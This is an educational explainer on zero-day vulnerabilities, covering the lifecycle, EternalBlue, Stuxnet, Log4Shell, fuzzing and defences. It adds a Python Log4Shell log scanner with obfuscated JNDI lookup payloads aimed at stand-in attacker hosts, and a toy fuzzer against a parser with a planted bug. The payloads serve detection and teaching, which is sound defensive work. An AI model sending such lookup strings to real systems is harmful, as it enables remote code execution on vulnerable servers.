Zero-Day
A vulnerability unknown to the vendor, with no patch available.
Exploit
Code or a technique that triggers a vulnerability to gain unauthorised access or code execution.
CVE
Common Vulnerabilities and Exposures — the global numbering system for known flaws.
Patch Gap
The dangerous window between a vulnerability becoming known and the fix actually being deployed on every affected system; attackers concentrate on this window because they know exactly what to target.

Understanding zero-day vulnerabilities

The name "zero-day" comes from the vendor's perspective: they have had zero days to work on a patch because they don't know the flaw exists. Once the vulnerability is publicly disclosed it becomes a "one-day" or "n-day", but until that moment defenders have no patch and no signature to rely on, and usually no idea what to look for.

A zero-day has three stages: the vulnerability (the flaw in the code), the exploit (the technique to weaponise it), and the attack (using the exploit against a real target). Not every zero-day becomes an attack — some are discovered by security researchers and disclosed responsibly before criminals ever find them.

Why "zero-day"? The term originates from the warez scene of the 1990s, where "zero-day" software meant a pirated copy released on the same day as the official launch — implying freshness and the absence of any protective response.

The zero-day lifecycle

From discovery to protection, a zero-day moves through a predictable chain. Understanding this chain helps defenders shorten the window of exposure.

  1. Discovery — A researcher, attacker, or automated fuzzing tool finds unexpected behaviour in software. The discoverer decides whether to report it, sell it, or exploit it silently.
  2. Weaponisation — An exploit is written that reliably triggers the vulnerability. Nation-states and criminal groups invest heavily in this phase, sometimes spending months refining a reliable exploit.
  3. Exploitation — The exploit is used against targets. Nation-state actors typically target a small number of high-value targets; criminal groups may deploy widely via phishing or exploit kits.
  4. Disclosure — The vulnerability becomes known, through responsible disclosure by a researcher, accidental leakage, or detection of exploitation in the wild. The clock starts ticking for a patch.
  5. Patching — The vendor releases a security update. The exploit still works against every unpatched system, which for widely deployed software can mean hundreds of millions of devices.
  6. Deployment — Organisations apply the patch. This phase can take weeks or months, especially in large enterprises, extending the window of risk long after a fix exists.

Famous zero-day exploits

Zero-days have shaped some of the most consequential cyberattacks in history. Three examples illustrate how wide-ranging their impact can be:

EternalBlue
NSA-developed SMB exploit leaked by the Shadow Brokers in April 2017. Weaponised within weeks by WannaCry and NotPetya, which together caused an estimated $10 billion or more in global damage. It is really a lesson about the deployment phase: Microsoft had fixed the bug (MS17-010) in March 2017, a month before the leak, so both worms spread through systems that were already patchable.
Stuxnet
Used four simultaneous Windows zero-days to sabotage Iranian nuclear centrifuges. Widely regarded as the world's first cyberweapon. Operated silently for years.
Log4Shell
CVE-2021-44228, CVSS 10.0. A single lookup string such as ${jndi:ldap://attacker/x} in any user-controlled field that got logged (a User-Agent header, a username, a chat message) could trigger remote code execution in any application using a vulnerable Log4j 2 version, which covered a huge share of the Java ecosystem. Mass scanning and exploitation followed within hours of public disclosure, and the first fix (Log4j 2.15.0) itself needed follow-up releases.
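What that single line looks like in practice, and one way to spot it in web server access logs, as an added example that is not from the original page or from the Log4j project: real Log4Shell probes hid the literal string "jndi:" behind nested ${lower:...} lookups, ${key:-default} default-value lookups (so ${::-j} is just "j") and URL encoding. The block below normalises those forms before matching, then runs over a handful of constructed log lines. The log lines, IP addresses and ports are made up (198.51.100.0/24 is a documentation range).

```python
import re
from urllib.parse import unquote

# Log4j 2 lookup forms that probes used to hide "jndi:" from naive pattern matching.
# ${lower:x} / ${upper:x} evaluate to x with its case changed; ${key:-x} evaluates
# to the default x whenever the lookup for key fails, so ${::-j} is simply "j".
CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
# After normalisation, any ${jndi: ... } is a lookup that reaches out to an attacker host.
JNDI_PROBE = re.compile(r"\$\{\s*jndi\s*:")


def normalise(text: str) -> str:
    """Undo URL encoding and resolve innermost lookups until nothing changes."""
    text = unquote(unquote(text))  # handle single- and double-encoded payloads
    for _ in range(32):  # bounded, so a pathological line cannot loop forever
        resolved = CASE_LOOKUP.sub(lambda m: m.group(1), text)
        resolved = DEFAULT_LOOKUP.sub(lambda m: m.group(1), resolved)
        if resolved == text:
            break
        text = resolved
    return text.lower()


def is_log4shell_probe(line: str) -> bool:
    """True when the line carries a JNDI lookup once obfuscation is stripped."""
    return JNDI_PROBE.search(normalise(line)) is not None


def scan(lines):
    """Return the indices of log lines that look like Log4Shell probes."""
    return [i for i, line in enumerate(lines) if is_log4shell_probe(line)]


# Constructed Apache-style access-log lines (not real traffic).
LOG_LINES = [
    '198.51.100.20 - - [10/Dec/2021:03:14:07 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.21 - - [10/Dec/2021:03:14:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '198.51.100.22 - - [10/Dec/2021:03:14:11 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/a}"',
    '198.51.100.23 - - [10/Dec/2021:03:14:12 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.7:1099/x}"',
    '198.51.100.24 - - [10/Dec/2021:03:14:15 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%3A1389%2Fa%7D HTTP/1.1" 200 512 "-" "curl/7.79"',
    '198.51.100.25 - - [10/Dec/2021:03:14:20 +0000] "GET /docs/jndi-tutorial.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for i in scan(LOG_LINES):
        print(f"line {i}: {normalise(LOG_LINES[i])}")
```

Matching only the literal `${jndi:` is what many first-day WAF rules did, and the nested and default-value forms above were written specifically to get past them; normalising first is the point of the example. The same logic applies to any field an application logs, not just the request line and User-Agent shown here.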

How zero-days are discovered

Zero-days don't require magic — they require patience, expertise, and tooling. Attackers and researchers use similar techniques to uncover hidden flaws:

  • Fuzzing: Automated tools feed software huge volumes of malformed or mutated input to trigger crashes and sanitizer reports, some of which turn out to be exploitable memory-safety bugs.
  • Code auditing: Reviewing source (for open-source projects) or reverse-engineering binaries to find logic errors, integer overflows, and use-after-free bugs.
  • Variant analysis: After a patch is released for one vulnerability, researchers look for the same bug pattern in nearby code, often finding several new flaws in one audit.
  • Symbolic execution: Tools treat program inputs as symbols and use a constraint solver to explore execution paths systematically, deriving concrete inputs that reach dangerous states; in practice path explosion limits this to parts of a program.
The grey market reality: A reliable iOS zero-day exploit can fetch over $1 million USD on grey markets. Nation-state intelligence agencies are willing buyers, creating a financial incentive to hoard vulnerabilities rather than disclose them.
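The fuzzing bullet above in miniature, as an added example that is not from the original page: a mutational fuzzer run against a constructed toy message parser with a planted bug (an unchecked index into a lookup table). The toy wire format, the parser, the `Rejected` exception and the `SEED` message are all invented for the example. The two design points worth noticing are that inputs the parser deliberately rejects are treated as normal behaviour, so only unexpected exceptions count as crashes, and that a crashing input is shrunk to the smallest byte string that still crashes, which is what a researcher would hand to a triage step.

```python
import random

# Constructed toy wire format (not a real protocol): MAGIC, record count, then
# `count` records of (type byte, length byte, payload). Record type 2 carries a
# one-byte index into SEVERITY_TABLE; that lookup is the planted bug.
MAGIC = 0x7F
SEVERITY_TABLE = ["info", "low", "high", "critical"]


class Rejected(ValueError):
    """Malformed input the parser refuses on purpose. Expected, not a bug."""


def parse_message(data: bytes) -> list:
    def need(pos: int, n: int) -> None:
        if pos + n > len(data):
            raise Rejected(f"truncated at offset {pos}")

    need(0, 2)
    if data[0] != MAGIC:
        raise Rejected("bad magic")
    count, pos, records = data[1], 2, []
    for _ in range(count):
        need(pos, 2)
        rtype, length = data[pos], data[pos + 1]
        pos += 2
        need(pos, length)
        payload = data[pos:pos + length]
        pos += length
        if rtype == 1:
            records.append(("name", payload.decode("ascii", "replace")))
        elif rtype == 2:
            # BUG: payload may be empty, and payload[0] is never range-checked.
            records.append(("severity", SEVERITY_TABLE[payload[0]]))
        else:
            records.append(("unknown", payload))
    return records


def crashes_parser(data: bytes) -> bool:
    """True only for unexpected exceptions; a Rejected input is the parser working."""
    try:
        parse_message(data)
    except Rejected:
        return False
    except Exception:
        return True
    return False


def mutate(data: bytes, rng: random.Random) -> bytes:
    """One random mutation: bit flip, boundary byte, delete a byte, or duplicate a slice."""
    buf = bytearray(data)
    choice = rng.randrange(4)
    if choice == 0 and buf:
        buf[rng.randrange(len(buf))] ^= 1 << rng.randrange(8)
    elif choice == 1 and buf:
        buf[rng.randrange(len(buf))] = rng.choice([0x00, 0x01, 0x7F, 0x80, 0xFF])
    elif choice == 2 and len(buf) > 1:
        del buf[rng.randrange(len(buf))]
    else:
        i = rng.randrange(len(buf) + 1)
        buf[i:i] = buf[max(0, i - 4):i] or b"\x00"
    return bytes(buf)


def fuzz(seed_input: bytes, iterations: int = 1000, seed: int = 1) -> list:
    """Mutational fuzz loop: keep accepted inputs as new seeds, record crashing ones."""
    rng = random.Random(seed)
    corpus, seen, crashes = [seed_input], {seed_input}, []
    for _ in range(iterations):
        candidate = rng.choice(corpus)
        for _ in range(1 + rng.randrange(3)):  # stack 1-3 mutations per candidate
            candidate = mutate(candidate, rng)
        try:
            parse_message(candidate)
        except Rejected:
            continue
        except Exception as exc:
            crashes.append((candidate, f"{type(exc).__name__}: {exc}"))
            continue
        if candidate not in seen:  # accepted input: worth mutating further
            seen.add(candidate)
            corpus.append(candidate)
    return crashes


def minimize(crash_input: bytes) -> bytes:
    """Greedy shrink: drop single bytes while the input still crashes the parser."""
    current = crash_input
    while True:
        for i in range(len(current)):
            trial = current[:i] + current[i + 1:]
            if crashes_parser(trial):
                current = trial
                break
        else:
            return current


# Valid seed: one name record ("host") and one severity record (index 1 = "low").
SEED = bytes([MAGIC, 2, 1, 4]) + b"host" + bytes([2, 1, 1])

if __name__ == "__main__":
    found = fuzz(SEED)
    print(f"{len(found)} crashing inputs")
    if found:
        data, reason = found[0]
        print("first crash:", reason, "minimised to", minimize(data).hex())
```

Real fuzzers (AFL++, libFuzzer, syzkaller) add the two things this toy lacks: coverage feedback, so that a mutant which reaches new code is kept even when it is rejected, and sanitizers, so that a silent out-of-bounds read in native code is turned into a loud crash the way Python's IndexError is here.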

Defending against zero-days

By definition, you cannot patch a vulnerability you don't know about. But you can dramatically reduce the blast radius when a zero-day is exploited:

  • Patch n-days fast: Most real-world intrusions use known vulnerabilities that already have patches. Fast patching of known CVEs denies attackers the cheap option of reusing old exploits, and it is also the only cure for a zero-day once it has become an n-day.
  • Network segmentation: Limit what a compromised system can reach. A zero-day in a web server shouldn't give access to your database.
  • Behavioural detection (EDR): Modern endpoint detection doesn't rely only on signatures; it watches for suspicious behaviour such as unusual process injection, credential access, or privilege escalation, which an exploit must still perform whether or not the initial bug is known.
  • Least privilege: Running software with minimal permissions limits what an exploit can do even if it succeeds.
  • Sandboxing: Isolating untrusted code (email attachments, browser tabs) limits zero-day impact to the sandbox environment, so the attacker needs a second bug (a sandbox escape) to do real damage.

Bug bounties and responsible disclosure

Bug bounty programmes offer a legal, ethical way for security researchers to report vulnerabilities in exchange for financial rewards. Companies like Google, Microsoft, and Apple run programmes that pay tens of thousands of dollars for critical discoveries — channelling the same talent that might otherwise sell to grey markets into defensive outcomes.

Responsible disclosure (also called "coordinated disclosure") is the standard practice: a researcher reports a flaw privately to the vendor, allows a reasonable time for a patch (typically 90 days), and then discloses publicly. This balances transparency with giving users time to update.

Learn vulnerability research in CEH v13

EC-Council's CEH v13 covers CVE analysis, exploit development methodology, and vulnerability scanning across 20 modules with hands-on Kali Linux labs.
